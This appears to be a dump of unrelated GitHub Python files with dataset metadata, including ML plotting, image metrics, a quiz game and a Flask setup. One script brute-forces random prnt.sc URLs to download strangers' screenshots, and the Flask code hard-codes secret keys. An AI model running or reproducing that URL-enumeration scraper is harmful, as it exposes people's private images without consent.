    fig.set_size_inches(15, 4)
    font = {"fontname": "arial", "fontsize": 18}

    exact_matrix = kernel(X, X)
    reference_ax = axes[0]
    reference_ax.imshow(exact_matrix, cmap=plt.cm.Blues)
    reference_ax.set_title("Exact kernel", **font)
    reference_ax.set_xticks([])
    reference_ax.set_yticks([])

    for n_f, ax in zip(n_features, axes[1:]):
        print("# of features = ", n_f)
        sampler = features_sampler_class(
            **features_sampler_kwargs, n_random_features=n_f)
        sampled_features = sampler.fit_transform(X)
        approx_matrix = sampled_features @ sampled_features.T
        ax.imshow(approx_matrix, cmap=plt.cm.Blues)
        residual = exact_matrix - approx_matrix
        err_mean = np.mean(np.abs(residual))
        err_max = np.max(np.abs(residual))
        ax.set_xlabel(
            "err (mean) = {:.4f} \n err (max) = {:.4f}".format(err_mean, err_max),
            **font
        )
        ax.set_title("{} features".format(n_f), **font)
        ax.set_xticks([])
        ax.set_yticks([])
    plt.tight_layout()
    plt.show()
def plot_kernel_error(
    X: np.ndarray,
    kernel: Callable[[np.ndarray, np.ndarray], np.ndarray],
    features_sampler_class: Union[
        Type[RandomFeaturesSampler], Type[NystroemFeaturesSampler]
    ],
    features_sampler_kwargs: np.ndarray,
    n_features: np.ndarray,
    kernel_name: str,
) -> None:
    """Plot the mean absolute kernel-approximation error vs. #features.

    Parameters
    ----------
    X:
        Data matrix of shape (n_instances, n_data_features).
    kernel:
        Exact kernel function; the reference matrix is kernel(X, X).
    features_sampler_class:
        Sampler class (RFF or Nyström) used to approximate the kernel.
    features_sampler_kwargs:
        Keyword arguments forwarded to the sampler constructor.
    n_features:
        Numbers of random features to evaluate.
    kernel_name:
        Kernel label used in the plot title.
    """
    kernel_matrix = kernel(X, X)
    # Accumulate in a list and convert once: avoids the quadratic
    # np.append-in-a-loop pattern.
    mean_errors = []
    for n_f in n_features:
        # Create sampler.
        features_sampler = features_sampler_class(
            **features_sampler_kwargs, n_random_features=n_f
        )
        # Compute approximation and its mean absolute error.
        X_features = features_sampler.fit_transform(X)
        kernel_matrix_approx = X_features @ X_features.T
        mean_errors.append(np.mean(np.abs(kernel_matrix - kernel_matrix_approx)))
    errors = np.asarray(mean_errors)
    # Plotting
    _, ax = plt.subplots(1, 1, figsize=(10, 6))
    font = {"fontname": "arial", "fontsize": 18}
    ax.plot(n_features, errors, color="deepskyblue", label=r"kernel error")
    ax.set_title("{} kernel error study".format(kernel_name), **font)
    # Bug fix: the labelled curve was never rendered — show the legend and
    # the figure, matching demo_kernel_approximation_features' behaviour.
    ax.legend()
    plt.show()
if __name__ == "__main__":
    """
    import matplotlib.pyplot as plt
    import numpy as np
    from sklearn import datasets, svm
    from sklearn.kernel_approximation import RBFSampler
    from sklearn.metrics.pairwise import rbf_kernel

    import kernel_approximation as ka

    # A not so simple 2 D problem
    X, Y = datasets.make_moons(n_samples=100, noise=0.3, random_state=0)

    # Compute grid of points for plotting the decision regions
    grid_x, grid_y = np.meshgrid(
        np.linspace(-3, 3, 50),
        np.linspace(-3, 3, 50),
    )
    grid_X = np.c_[grid_x.ravel(), grid_y.ravel()]
    gamma = 0.5

    # Kernel matrix
    def kernel(X, Y):
        return rbf_kernel(X, Y, gamma=gamma)

    n_nystroem_features = 20
    nystroem_sampler = NystroemFeaturesSampler(kernel)
    nystroem_features = nystroem_sampler.fit_transform(X)
    nystroem_features_grid = nystroem_sampler.transform(grid_X)
    clf = svm.SVC(kernel='linear')
    # clf = svm.NuSVC(gamma='auto')
    clf.fit(nystroem_features, Y)
    """

    import matplotlib.pyplot as plt
    import numpy as np
    from sklearn import datasets
    from sklearn.gaussian_process.kernels import Matern
    from sklearn.kernel_approximation import RBFSampler
    from sklearn.metrics.pairwise import rbf_kernel

    # 3-D data
    n_instances = 1000
    X, t = datasets.make_s_curve(n_instances, noise=0.1)
    X = X[np.argsort(t)]

    # 2-D data
    # X, y = datasets.make_moons(n_samples=400, noise=.05)
    # X = X[np.argsort(y)]

    # Reshape if necessary
    if X.ndim == 1:
        X = X[:, np.newaxis]

    # Kernel parameters
    sigma = 1.0
    gamma = 1.0 / (2.0 * sigma**2)

    n_nystroem_features = [10, 100, 1000]

    # Kernel function
    def kernel(X, Y):
        return rbf_kernel(X, Y, gamma=gamma)

    # Bug fix: demo_kernel_approximation_features takes 5 required arguments
    # (X, kernel, sampler CLASS, sampler kwargs, n_features).  The previous
    # call passed a ready-made sampler instance and omitted n_features,
    # which raised a TypeError at runtime.
    demo_kernel_approximation_features(
        X,
        kernel,
        NystroemFeaturesSampler,
        {"kernel": kernel},
        n_nystroem_features,
    )
| fjsaezm/mcd-mf | HW_02/kernel_approximation.py | kernel_approximation.py | py | 12,959 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "abc.ABC",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "sklearn.base.BaseEstimator",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "sklearn.base.TransformerMixin",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "nump... |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import string
import random
import time

# Use a raw string so the backslash in the Windows path can never be
# interpreted as an escape sequence (fragile in the original).
path = r"D:\chromedriver.exe"
driver = webdriver.Chrome(path)
print("Opening up the browser")
driver.get("https://prnt.sc/")
print("Preparing cookies...")
# Dismiss the cookie-consent banner before scraping.
driver.find_element_by_css_selector('.css-47sehv').click()
time.sleep(2)
while True:
    # Random 6-character id in prnt.sc's URL namespace.
    rastgele = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
    site = str(f'http://prnt.sc/{rastgele}')
    time.sleep(1)
    print("Accessing this site: " + site)
    driver.get(site)
    time.sleep(0.5)
    print("Locating image...")
    time.sleep(2)
    filename = 'result' + rastgele + '.png'
    try:
        # Locate the element once and reuse it; the original repeated the
        # XPath lookup for the screenshot, doubling the failure window.
        image = driver.find_element_by_xpath('//*[@id="screenshot-image"]')
        print("Downloading image...")
        print(image)
        with open(filename, 'wb') as file:
            file.write(image.screenshot_as_png)
        print("File successfully downloaded! File name : " + filename)
    except Exception:
        # Narrowed from a bare `except:` so Ctrl-C can still stop the loop.
        print("Image not found, going to the next link")
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "time.sleep",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "random.choices"... |
1187043277 | from sklearn.svm import LinearSVC
import metodos as m
def ObtenerHiperParametros(x_train, y_train, x_test, y_test):
    """Grid-search LinearSVC hyper-parameters, optimising recall."""
    grid = [
        { 'penalty': ['l1'], 'C': [1, 10, 100], 'dual': [False], 'class_weight': [{1:4}, {1:5}] }
    ]
    return m.GridSearch(LinearSVC(), grid, 'recall', x_train, y_train, x_test, y_test)
def Entrenar(x_train, y_train, parametros):
    """Fit a LinearSVC with the parameters previously selected by Grid Search:
    {'C': 1, 'class_weight': {1: 5}, 'dual': False, 'penalty': 'l1'}
    """
    modelo = LinearSVC(C=1, penalty='l1', dual=False, class_weight={1:5})
    # sklearn's fit() returns the estimator itself.
    return modelo.fit(x_train, y_train)
{
"api_name": "metodos.GridSearch",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sklearn.svm.LinearSVC",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sklearn.svm.LinearSVC",
"line_number": 16,
"usage_type": "call"
}
] |
347104407 | from graphviz import Digraph as DotGraph
MAX_EDGES = 2000
def gshow(g, attr=None, file_name=None, view=False):
    """Render a networkx DiGraph g with graphviz.

    It could become slow on large graphs (above MAX_EDGES edges the graph
    is not rendered at all).

    Fix: the original placed this text *after* the first statement, where it
    is a discarded string expression, not a docstring.

    :param g: the graph (None is tolerated and ignored)
    :param attr: optional edge attribute used as the edge label
    :param file_name: output file passed to graphviz render()
    :param view: open the rendered file when True
    """
    if g is None:
        return
    ecount = g.number_of_edges()
    if ecount > MAX_EDGES:
        print('GRAPH TOO BIG TO SHOW, EDGES=', ecount)
        return
    dot = DotGraph()
    for f, t, w in gen_dot_edges(g, attr=attr):
        dot.edge(f, t, label=w)
    print('generated:', file_name, 'edges:', ecount)
    dot.render(file_name, view=view)
def gen_dot_edges(g, attr=None):
    """Yield (source, target, label) string triples for every edge of g.

    Non-string node ids are rendered as "#<id>". ':' characters are replaced
    with '.' because graphviz treats ':' as a port separator. The label is
    the edge attribute *attr*, or '' when absent or attr is None.
    """
    for src, dst in g.edges():
        label = g[src][dst].get(attr) if attr else ''
        if not label:
            label = ''
        src_id = src if isinstance(src, str) else "#" + str(src)
        dst_id = dst if isinstance(dst, str) else "#" + str(dst)
        yield (src_id.replace(':', '.'), dst_id.replace(':', '.'), str(label))
def xshow(gs, attr=None, file_name=None, view=False):
    """Render a sequence of graphs (possibly transformations of the same
    graph) side by side in a single graphviz drawing.

    Nodes of graph i get an "@i" suffix so the sub-graphs stay disjoint.
    """
    dot = DotGraph()
    total_edges = 0
    for idx, graph in enumerate(gs):
        total_edges += graph.number_of_edges()
        if total_edges > MAX_EDGES:
            print('GRAPH CHAIN TOO BIG TO SHOW, EDGES=', total_edges)
            return
        suffix = "@" + str(idx)
        for src, dst, label in gen_dot_edges(graph, attr=attr):
            dot.edge(src + suffix, dst + suffix, label=label)
    print('generated:', file_name, 'edges:', total_edges)
    dot.render(file_name, view=view)
| ptarau/StanzaGraphs | logic/visualizer.py | visualizer.py | py | 1,657 | python | en | code | 8 | github-code | 1 | [
{
"api_name": "graphviz.Digraph",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "graphviz.Digraph",
"line_number": 45,
"usage_type": "call"
}
] |
37691349335 | import os
from PIL import Image
import torchvision
import torch, cv2, math, random
import numpy as np
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
device_id = [0]
IMG_EXTENSIONS = ['jpg', 'jpeg', 'png', 'ppm', 'bmp', 'pgm']
def mkdir(path):
    """Create directory *path* (including parents) if it does not exist.

    Uses exist_ok=True so there is no race between the exists() check and
    the makedirs() call (the original's check-then-create could raise if
    another process created the directory in between).
    """
    os.makedirs(path, exist_ok=True)
def pil_loader(path, mode='RGB'):
    """Open *path* as a file object to avoid ResourceWarning
    (https://github.com/python-pillow/Pillow/issues/835).

    :param path: image path (must have a known image extension)
    :param mode: PIL conversion mode, e.g. 'RGB' or 'YCbCr'
    :return: PIL.Image converted to *mode*
    """
    assert _is_image_file(path), "%s is not an image" % path
    with open(path, 'rb') as fh, Image.open(fh) as image:
        return image.convert(mode)
def calculate_RF(model):
    """Compute the receptive field of the Conv2d layers stacked in *model*.

    Walks the leaf layers last-to-first applying r = s*r + (k - s) per conv.
    Fix: the original read layer.padding into an unused local; padding does
    not enter the receptive-field recurrence, so the dead read is removed.
    NOTE(review): only the first element of kernel_size/stride is used, i.e.
    square kernels are assumed -- confirm for anisotropic models.
    """
    receptive = 1
    for layer in reversed(getLayers(model)):
        if isinstance(layer, torch.nn.Conv2d):
            kernel = layer.kernel_size[0]
            stride = layer.stride[0]
            receptive = stride * receptive + (kernel - stride)
    return receptive
def getLayers(model):
    """Collect every leaf layer (module without children) of *model*.

    :param model: a torch.nn.Module
    :return: flat list of leaf modules, in traversal order
    """
    collected = []

    def _walk(module):
        # Recurse into composite modules; append modules with no children.
        for _, child in module.named_children():
            if len(list(child.named_children())) == 0:
                collected.append(child)
            elif isinstance(child, torch.nn.Module):
                _walk(child)

    _walk(model)
    return collected
def load_as_tensor(path, mode='RGB'):
    """Load an image file as a 3D tensor.

    :param path: image path
    :param mode: 'Y' returns a 1-channel tensor (luma of YCbCr); 'RGB',
        'RGBA' and 'YCbCr' return 3 or 4 channels respectively
    :return: 3D tensor (C, H, W)
    """
    if mode == 'Y':
        # Load as YCbCr and keep only the first (luma) channel.
        return PIL2Tensor(pil_loader(path, mode='YCbCr'))[:1]
    return PIL2Tensor(pil_loader(path, mode=mode))
def PIL2Tensor(pil_image):
    # Convert a PIL image to a float CHW tensor scaled to [0, 1].
    return torchvision.transforms.functional.to_tensor(pil_image)
def Tensor2PIL(tensor_image, mode='RGB'):
    # Convert a CHW tensor (or 1xCHW batch of one) back to a PIL image.
    if len(tensor_image.size()) == 4 and tensor_image.size()[0] == 1:
        # Drop the leading batch dimension before conversion.
        tensor_image = tensor_image.view(tensor_image.size()[1:])
    return torchvision.transforms.functional.to_pil_image(tensor_image.detach().cpu(), mode=mode)
def _is_image_file(filename):
    """Return True when *filename* ends with a known image extension
    (case-insensitive).
    """
    lowered = filename.lower()
    # endswith accepts a tuple of suffixes -- one C-level call.
    return lowered.endswith(tuple(IMG_EXTENSIONS))
def image_files(path):
    """Return the absolute paths of the image files directly inside *path*.

    Fix: the original mutated the listdir() result in place and left every
    non-image entry as a bare file name, so callers received a mix of
    absolute paths and plain names; it also ran isdir() against the bare
    name (relative to the CWD, not to *path*). Now only image files are
    returned, each as an absolute path.
    """
    abs_path = os.path.abspath(path)
    return [
        os.path.join(abs_path, entry)
        for entry in os.listdir(abs_path)
        if _is_image_file(entry) and not os.path.isdir(os.path.join(abs_path, entry))
    ]
def split_to_batches(l, n):
    """Yield consecutive slices of *l* of length *n* (the last one may be
    shorter)."""
    start = 0
    while start < len(l):
        yield l[start:start + n]
        start += n
def _sigmoid_to_tanh(x):
"""
range [0, 1] to range [-1, 1]
:param x: tensor type
:return: tensor
"""
return (x - 0.5) * 2.
def _tanh_to_sigmoid(x):
"""
range [-1, 1] to range [0, 1]
:param x:
:return:
"""
return x * 0.5 + 0.5
def _add_batch_one(tensor):
"""
Return a tensor with size (1, ) + tensor.size
:param tensor: 2D or 3D tensor
:return: 3D or 4D tensor
"""
return tensor.view((1, ) + tensor.size())
def _remove_batch(tensor):
"""
Return a tensor with size tensor.size()[1:]
:param tensor: 3D or 4D tensor
:return: 2D or 3D tensor
"""
return tensor.view(tensor.size()[1:])
def mod_crop(tensor, scale=4):
    """Crop H and W of an NCHW tensor so both are divisible by *scale*."""
    _, _, height, width = tensor.shape
    new_h = height - height % scale
    new_w = width - width % scale
    return tensor[:, :, :new_h, :new_w]
def isotropic_gaussian_kernel(l, sigma, epsilon=1e-5):
    """Return an l x l isotropic Gaussian kernel normalised to sum to 1.

    *epsilon* keeps the denominator positive for sigma == 0.
    """
    coords = np.arange(-l // 2 + 1., l // 2 + 1.)
    grid_x, grid_y = np.meshgrid(coords, coords)
    raw = np.exp(-(grid_x ** 2 + grid_y ** 2) / (2. * (sigma + epsilon) ** 2))
    return raw / np.sum(raw)
def prepare_images(hr_path, scale=4):
    """Load an HR image, crop it to a multiple of *scale*, and build its
    bicubic LR counterpart.

    :return: (lr_pil, hr_pil) PIL image pair
    """
    hr_pil = Image.open(hr_path)
    width, height = hr_pil.size
    hr_pil = hr_pil.crop((0, 0, width - width % scale, height - height % scale))
    width, height = hr_pil.size
    lr_pil = hr_pil.resize((width // scale, height // scale), Image.BICUBIC)
    return lr_pil, hr_pil
def same_seeds(seed = 2022):
    """Seed every RNG source (python, numpy, torch CPU/GPU) and force
    deterministic backends so runs are reproducible."""
    random.seed(seed)
    np.random.seed(seed)  # fix numpy's global RNG for subsequent random calls
    torch.manual_seed(seed)  # fix the CPU random seed
    # if torch.cuda.is_available():  # fix the GPU random seed
    torch.cuda.manual_seed(seed)  # seed the current GPU
    torch.cuda.manual_seed_all(seed)  # seed all GPUs
    torch.use_deterministic_algorithms(True)
    torch.backends.cudnn.enabled = False
    torch.backends.cudnn.benchmark = False  # set True only when net/input sizes are fixed
    torch.backends.cudnn.deterministic = True  # force deterministic cudnn algorithms
    os.environ['PYTHONHASHSEED'] = str(seed)
    # Required by use_deterministic_algorithms for CUBLAS determinism.
    os.environ['CUBLAS_WORKSPACE_CONFIG'] = ':4096:8'
def post_process(input):
    """Clamp a 1xCxHxW tensor to [0, 1] and convert it to an HxWxC uint8
    numpy image."""
    clamped = torch.clamp(input, min=0., max=1.)
    # Drop the batch dim, move channels last (C,H,W -> H,W,C).
    hwc = np.moveaxis(torch.squeeze(clamped, 0).detach().cpu().numpy(), 0, 2)
    scaled = hwc * 255
    return scaled.astype(np.uint8)
def calculate_psnr(img1, img2):
    """PSNR in dB between two images with values in [0, 255]; inf for
    identical inputs."""
    diff = img1.astype(np.float64) - img2.astype(np.float64)
    mse = np.mean(diff ** 2)
    if mse == 0:
        return float("inf")
    return 20 * math.log10(255.0 / math.sqrt(mse))
def ssim(img1, img2):
    """Mean SSIM between two single-channel images with values in [0, 255],
    computed with an 11x11 Gaussian window (sigma 1.5), borders trimmed."""
    c1 = (0.01 * 255) ** 2
    c2 = (0.03 * 255) ** 2
    a = img1.astype(np.float64)
    b = img2.astype(np.float64)
    gauss = cv2.getGaussianKernel(11, 1.5)
    window = np.outer(gauss, gauss.transpose())
    # Local means (valid region only).
    mu_a = cv2.filter2D(a, -1, window)[5:-5, 5:-5]
    mu_b = cv2.filter2D(b, -1, window)[5:-5, 5:-5]
    mu_a_sq = mu_a ** 2
    mu_b_sq = mu_b ** 2
    mu_ab = mu_a * mu_b
    # Local variances and covariance.
    var_a = cv2.filter2D(a ** 2, -1, window)[5:-5, 5:-5] - mu_a_sq
    var_b = cv2.filter2D(b ** 2, -1, window)[5:-5, 5:-5] - mu_b_sq
    cov_ab = cv2.filter2D(a * b, -1, window)[5:-5, 5:-5] - mu_ab
    ssim_map = ((2 * mu_ab + c1) * (2 * cov_ab + c2)) / (
        (mu_a_sq + mu_b_sq + c1) * (var_a + var_b + c2)
    )
    return ssim_map.mean()
def calculate_ssim(img1, img2):
    """calculate SSIM
    the same outputs as MATLAB's
    img1, img2: [0, 255]

    Fix: the 3-channel branch previously called ssim(img1, img2) on the full
    arrays for every iteration (ignoring the channel index i); it now slices
    each colour channel, matching the commented reference implementation
    further down in this file.
    """
    if not img1.shape == img2.shape:
        raise ValueError("Input images must have the same dimensions.")
    if img1.ndim == 2:
        return ssim(img1, img2)
    elif img1.ndim == 3:
        if img1.shape[2] == 3:
            # Average the per-channel SSIM over the three colour channels.
            ssims = [ssim(img1[:, :, i], img2[:, :, i]) for i in range(3)]
            return np.array(ssims).mean()
        elif img1.shape[2] == 1:
            return ssim(np.squeeze(img1), np.squeeze(img2))
    else:
        raise ValueError("Wrong input image dimensions.")
# def calculate_psnr(img1, img2, border=0):
# # img1 and img2 have range [0, 255]
# #img1 = img1.squeeze()
# #img2 = img2.squeeze()
# if not img1.shape == img2.shape:
# raise ValueError('Input images must have the same dimensions.')
# h, w = img1.shape[:2]
# img1 = img1[border:h-border, border:w-border]
# img2 = img2[border:h-border, border:w-border]
#
# img1 = img1.astype(np.float64)
# img2 = img2.astype(np.float64)
# mse = np.mean((img1 - img2)**2)
# if mse == 0:
# return float('inf')
# return 20 * math.log10(255.0 / math.sqrt(mse))
#
#
# # --------------------------------------------
# # SSIM
# # --------------------------------------------
# def calculate_ssim(img1, img2, border=0):
# '''calculate SSIM
# the same outputs as MATLAB's
# img1, img2: [0, 255]
# '''
# #img1 = img1.squeeze()
# #img2 = img2.squeeze()
# if not img1.shape == img2.shape:
# raise ValueError('Input images must have the same dimensions.')
# h, w = img1.shape[:2]
# img1 = img1[border:h-border, border:w-border]
# img2 = img2[border:h-border, border:w-border]
#
# if img1.ndim == 2:
# return ssim(img1, img2)
# elif img1.ndim == 3:
# if img1.shape[2] == 3:
# ssims = []
# for i in range(3):
# ssims.append(ssim(img1[:,:,i], img2[:,:,i]))
# return np.array(ssims).mean()
# elif img1.shape[2] == 1:
# return ssim(np.squeeze(img1), np.squeeze(img2))
# else:
# raise ValueError('Wrong input image dimensions.')
#
#
# def ssim(img1, img2):
# C1 = (0.01 * 255)**2
# C2 = (0.03 * 255)**2
#
# img1 = img1.astype(np.float64)
# img2 = img2.astype(np.float64)
# kernel = cv2.getGaussianKernel(11, 1.5)
# window = np.outer(kernel, kernel.transpose())
#
# mu1 = cv2.filter2D(img1, -1, window)[5:-5, 5:-5] # valid
# mu2 = cv2.filter2D(img2, -1, window)[5:-5, 5:-5]
# mu1_sq = mu1**2
# mu2_sq = mu2**2
# mu1_mu2 = mu1 * mu2
# sigma1_sq = cv2.filter2D(img1**2, -1, window)[5:-5, 5:-5] - mu1_sq
# sigma2_sq = cv2.filter2D(img2**2, -1, window)[5:-5, 5:-5] - mu2_sq
# sigma12 = cv2.filter2D(img1 * img2, -1, window)[5:-5, 5:-5] - mu1_mu2
#
# ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) *
# (sigma1_sq + sigma2_sq + C2))
# return ssim_map.mean()
def cv2_to_pil(img):
    # OpenCV arrays are BGR; convert to RGB (and uint8) before wrapping in PIL.
    image = Image.fromarray(cv2.cvtColor(img.astype(np.uint8), cv2.COLOR_BGR2RGB))
    return image
def pil_to_cv2(img):
    # PIL images are RGB; convert to OpenCV's BGR channel order.
    image = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)
    return image
{
"api_name": "torch.device",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
... |
6398213595 | from random import randint, choice
from datetime import datetime
now = datetime.now()
current_time = now.strftime("%d/%m/%Y")
file_name = "math_game_log.txt"
# Functions
def append_wrong_answer(answer, operation, file_name=file_name):
    """Append a wrong answer (expression, user input, expected value) to the
    game log file."""
    expected = eval(operation)
    entry = f'\tExpression: {operation}, User Input: {answer}, Expected: {expected}\n'
    with open(file_name, 'a') as log:
        log.write(entry)
def check_if_int(answer):
    '''Checks if the input is an integer. '''
    try:
        int(answer)
        return True
    except ValueError:
        print('Your answer cannot contain anything other than numbers. Please try again: ')
        return False
def addition(a, b):
    """Quiz the user on a + b; return a feedback message and log mistakes."""
    operation = f"{a} + {b}"
    answer = input(operation + ' = ')
    # Re-prompt until the reply parses as an integer.
    while not check_if_int(answer):
        answer = input('\n' + operation + ' = ')
    if int(answer) == eval(operation):
        return 'Excellent!'
    append_wrong_answer(answer, operation)
    return f'Incorrect. The correct answer is {eval(operation)}.'
def subtraction(a, b):
    """Quiz the user on a - b; on 'easy' difficulty, re-roll the operands so
    the result is never negative."""
    if difficulty == 'easy':
        lo, hi = difficulty_lvls['easy'][0][0], difficulty_lvls['easy'][0][-1]
        while b > a:
            a, b = randint(lo, hi), randint(lo, hi)
    operation = f"{a} - {b}"
    answer = input(operation + ' = ')
    while not check_if_int(answer):
        answer = input('\n' + operation + ' = ')
    if int(answer) == eval(operation):
        return f'Correct! Well done, {name}.'
    append_wrong_answer(answer, operation)
    return f'Incorrect. The correct answer is {eval(operation)}.'
def multiplication(a, b):
    """Quiz the user on a * b; return a feedback message and log mistakes."""
    operation = f"{a} * {b}"
    answer = input(operation + ' = ')
    while not check_if_int(answer):
        answer = input('\n' + operation + ' = ')
    if int(answer) == eval(operation):
        return f'Good job, {name}!'
    append_wrong_answer(answer, operation)
    return f'Incorrect. The correct answer is {eval(operation)}.'
# *Actual game:*
"""For the dictionary below:
The first element of each list is the smallest possible number to be used
the second is the largest possible number. The first list is for the addition and
subtraction questionss, the second is for the multiplication questions."""
difficulty_lvls = {
    'easy': [[5, 30], [2, 11]],
    'intermediate': [[10, 50], [3, 12]],
    'difficult': [[12, 100], [4, 17]],
    'expert': [[30, 2000], [6, 30]],
}
name = input('Please enter your name: ').title()
difficulty = input("Difficulty level (easy, intermediate, difficult, expert): ")
# Re-prompt until a valid level name is entered.
while difficulty not in difficulty_lvls:
    difficulty = input("\nYou chose a non-existent level."\
        "Please try again(easy, intermediate, difficult, expert): ")
# while False
# while difficulty in difficulty_lvls == False:
#     difficulty = input("\nYou chose a non-existent level."\
#         "Please try again(easy, intermediate, difficult, expert): ")
# Write a dated session header to the log (date line only once per day).
with open(file_name) as f:
    contents = f.read()
with open(file_name, 'a') as f:
    if current_time not in contents:
        f.write(current_time + ': \n')
    f.write('\n' + name + ':')
    f.write('\n\t' + difficulty.title() + '\n')
lst = ['addition', 'subtraction', 'multiplication']
greeting = (f"\nHello, {name}. You'll be given a chance to exit this program "\
    " and level up after every 5 attempts. Let's begin! \n")
print(greeting)
i = 0
while True:
    # Refresh the operand bounds every 5 questions (the difficulty may have
    # changed at the previous checkpoint).
    if i % 5 == 0:
        d = difficulty
        x1, x2 = difficulty_lvls[d][0][0], difficulty_lvls[d][0][-1]
        y1, y2 = difficulty_lvls[d][-1][0], difficulty_lvls[d][-1][-1]
    # The issue here is that randint does not accept ranges
    # NOTE(review): original indentation was lost; the operand draws below may
    # have been inside the i%5 block -- confirm against upstream history.
    a1, a2 = randint(x1, x2), randint(x1, x2)
    m1, m2 = randint(y1, y2), randint(y1, y2)
    '''Randomizer'''
    chosen = choice(lst)
    if chosen == lst[0]:
        print(addition(a1, a2))
    elif chosen == lst[1]:
        print(subtraction(a1, a2))
    else:
        print(multiplication(m1, m2))
    i += 1
    # Checkpoint every 5 questions: offer to quit and to level up.
    if i % 5 == 0:
        print('\n')
        answer = input(f'Would you like to continue, {name}? (yes/no) ')
        if answer == 'no':
            break
        # Here we ask if the user wants to go on to the next level. We must first
        # check if the user is not currently at the last level as there is no lvl to lvl up to.
        if difficulty in list(difficulty_lvls.keys())[:-1]:
            lvl_up = input("Would you like to advance to the next level? (yes/no) ")
            if lvl_up == 'yes':
                next_index = list(difficulty_lvls.keys()).index(difficulty) + 1
                difficulty = list(difficulty_lvls.keys())[next_index]
                print(f"\nNew difficulty level: {difficulty.title()}\n")
                with open(file_name, 'a') as f:
                    f.write('\n\t' + difficulty.title() + '\n')
{
"api_name": "datetime.datetime.now",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 3,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "random.randint",... |
37639002029 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import sys
import argparse
import numpy as np
from collections import defaultdict,Counter
__author__ = 'menghao'
__mail__ = 'haomeng@genome.cn'
bindir = os.path.abspath(os.path.dirname(__file__))
pat1 = re.compile('^\s*$')
def parser_fasta(fasta):
    """Parse a FASTA file into a 2-D numpy char array (one row per record).

    NOTE(review): assumes all sequences have the same length; ragged input
    would break the np.array construction -- confirm upstream guarantees.
    """
    sequences = {}
    current = None
    with open(fasta) as handle:
        for raw in handle:
            line = raw.rstrip()
            if line.startswith('>'):
                current = line[1:]
            else:
                sequences.setdefault(current, []).extend(line)
    return np.array([list(chars) for chars in sequences.values()])
def main():
    """Print the consensus string and the A/C/T/G profile of a FASTA file."""
    parser = argparse.ArgumentParser(usage='Consensus_and_Profile',
                                     description=__doc__,
                                     formatter_class=argparse.RawDescriptionHelpFormatter,
                                     epilog='author:\t{0}\nmail:\t{1}'.format(__author__, __mail__))
    parser.add_argument('-i', '--input', help='input', dest='input', required=True)
    args = parser.parse_args()
    matrix = parser_fasta(args.input)
    profile = {base: [] for base in ('A', 'C', 'T', 'G')}
    consensus_chars = []
    for col in range(matrix.shape[1]):
        counts = Counter(matrix[:, col])
        # most_common(1) keeps the original tie-breaking behaviour.
        consensus_chars.append(counts.most_common(1)[0][0])
        for base in ('A', 'C', 'T', 'G'):
            profile[base].append(str(counts[base]))
    print(''.join(consensus_chars))
    for base in ('A', 'C', 'T', 'G'):
        print('{0}: {1}'.format(base, ' '.join(profile[base])))


if __name__ == "__main__":
    main()
{
"api_name": "os.path.abspath",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_n... |
26922251758 | from flask import Flask, request, jsonify
from models.db import db
from models.User_model import User
from backend.controller.extensions import bcrypt, jwt_manager, session
from datetime import datetime, timezone, timedelta
from flask_jwt_extended import get_jwt, create_access_token, get_jwt_identity
from flask_cors import CORS
import json
def create_app():
    """Application factory: configure Flask, its extensions, JWT refresh
    middleware, and register the API blueprints."""
    app = Flask(__name__)
    app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'
    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
    # NOTE(review): hard-coded secrets committed to source; these should be
    # loaded from environment/config in production.
    app.config['SECRET_KEY'] = "215fb79f1848d253c541f30f2e83a86965d178fed3594e7adf4df128a90fb2633af7bbded04ff63f4214cb1d896cd2e119a9f6da64c26a74d283911c32fb5a4f"
    app.config['SESSION_TYPE'] = 'filesystem'
    app.config['JWT_SECRET_KEY'] = "06973e058893087d8aa8d73513c35254e097b25fe75131ad53dacf6e06296227e58955fad64d4d00862ac73a6d089ce7d422c017bab866eb8893be4540884d41"
    cors = CORS(app)
    with app.app_context():
        # Bind the shared extension instances to this app.
        db.init_app(app)
        bcrypt.init_app(app)
        jwt_manager.init_app(app)
        session.init_app(app)

        @app.after_request
        def refresh_expiring_jwts(response):
            # Sliding-expiry: if the JWT expires within 30 minutes, mint a
            # fresh token and inject it into the JSON response body.
            try:
                exp_timestamp = get_jwt()["exp"]
                now = datetime.now(timezone.utc)
                target_timestamp = datetime.timestamp(now + timedelta(minutes=30))
                if target_timestamp > exp_timestamp:
                    print(get_jwt_identity())
                    access_token = create_access_token(identity=get_jwt_identity())
                    data = response.get_json()
                    if type(data) is dict:
                        data["access_token"] = access_token
                        response.data = json.dumps(data)
                return response
            except (RuntimeError, KeyError):
                # Case where there is not a valid JWT. Just return the original respone
                return response

        @jwt_manager.user_lookup_loader
        def user_lookup_callback(_jwt_header, jwt_data):
            # Resolve the JWT subject (an email) to a User row, or None.
            identity = jwt_data["sub"]
            return User.query.filter_by(email=identity).one_or_none()

